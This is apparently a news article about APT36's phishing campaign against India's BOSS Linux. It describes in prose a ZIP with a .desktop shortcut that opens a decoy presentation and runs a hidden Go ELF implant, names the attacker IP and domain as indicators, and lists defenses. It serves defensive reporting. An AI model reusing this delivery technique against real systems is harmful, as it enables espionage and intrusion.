The Cyber Warfare between India and Pakistan rages on

In a new phase of regional cyber conflict, Pakistan-linked threat actor APT36 — also known as Transparent Tribe — has escalated its operations against Indian government targets. This time, the group has moved beyond Windows and Android platforms, setting its sights on a lesser-targeted but strategically critical environment: Linux.

Specifically, the group has engineered a campaign tailored for BOSS Linux (Bharat Operating System Solutions), the Indian government’s official Debian-based distribution. Used by defense personnel and various public institutions, BOSS Linux powers systems that manage internal communications, classified documents, and critical operational workflows.

These aren’t opportunistic or high-volume attacks aimed at casual users. The victims in this case include individuals and organizations at the heart of India’s national defense infrastructure — those with direct or privileged access to sensitive systems and strategic data. In targeting them, APT36 has made its intent clear: not disruption, but infiltration and long-term access. It’s a campaign that underscores the group’s geopolitical focus and its evolving technical capabilities.

Cyber Shelling

Initial access is achieved through a deceptive phishing email carrying an attachment titled Cyber-Security-Advisory.zip. Inside this compressed archive lies a seemingly benign .desktop file — a common shortcut format in Linux environments. But once clicked, the file unleashes a two-pronged attack designed to both distract and compromise.

First, it launches a PowerPoint presentation that appears legitimate, intended to convince the target that the attachment is safe. Simultaneously, and without the user’s awareness, the .desktop file deploys and runs a hidden Go-based ELF binary, saved locally under the name client.elf.

This binary, specifically compiled for Linux systems, connects to attacker-controlled infrastructure. The malware initiates communication with IP address 101.99.92.182 and the domain sorlastore.com, both of which have been previously attributed to APT36 operations. This connection enables the threat actor to establish remote access and maintain persistent control over the infected system.

The use of a Go-compiled ELF payload, combined with stealthy delivery and execution via Linux shortcuts, represents a notable evolution in APT36’s tactics. It also highlights the growing strategic importance of Linux as a target in state-sponsored espionage.

Cyber Bomb-Proof Shelter

• Disable auto-execution of .desktop files in BOSS Linux and similar environments to prevent silent malware activation via shortcuts.

• Enforce application allow-lists to ensure only trusted and signed software can be executed, blocking unauthorized binaries like client.elf.

• Configure PowerPoint and similar viewers to open in read-only mode to reduce the effectiveness of visual decoys.

• Redirect downloads from untrusted sources to no-execute partitions or sandboxed directories, limiting their ability to run without explicit permission.

• Implement zero-trust segmentation across internal networks to isolate compromised endpoints and prevent lateral movement within sensitive infrastructure.

• Monitor and restrict outbound traffic to known APT36 infrastructure such as IP 101.99.92.182 and the domain sorlastore.com.

• Train users to recognize phishing lures that exploit themes like cybersecurity advisories, especially when ZIP files are involved.

Linking Back to the Battlefield

APT36’s recent campaign reflects a broader strategic trajectory. Since its emergence, the group has demonstrated a persistent focus on Indian targets. In 2016, Operation C-Major used Adobe Reader exploits and Android spyware to gather military credentials. In 2024, CapraRAT was deployed in disguise as popular mobile games and apps to steal personal and organizational data from Indian users. Each step in the group’s evolution shows a willingness to adapt, explore new platforms, and deepen its reach into the systems that matter most.

By targeting BOSS Linux, APT36 is not just expanding its toolkit — it is exploiting a blind spot in regional cybersecurity posture. The attack marks a shift in threat actor behavior, where even national operating systems are no longer off the table.

It begins with a ZIP file and a shortcut, but its real target is institutional trust, system integrity, and strategic control. For India and for other nations relying on Linux in critical contexts, the path forward lies not in assuming security, but in engineering it from the kernel up.

https://hackread.com/pakistan-transparent-tribe-indian-defence-linux-malware/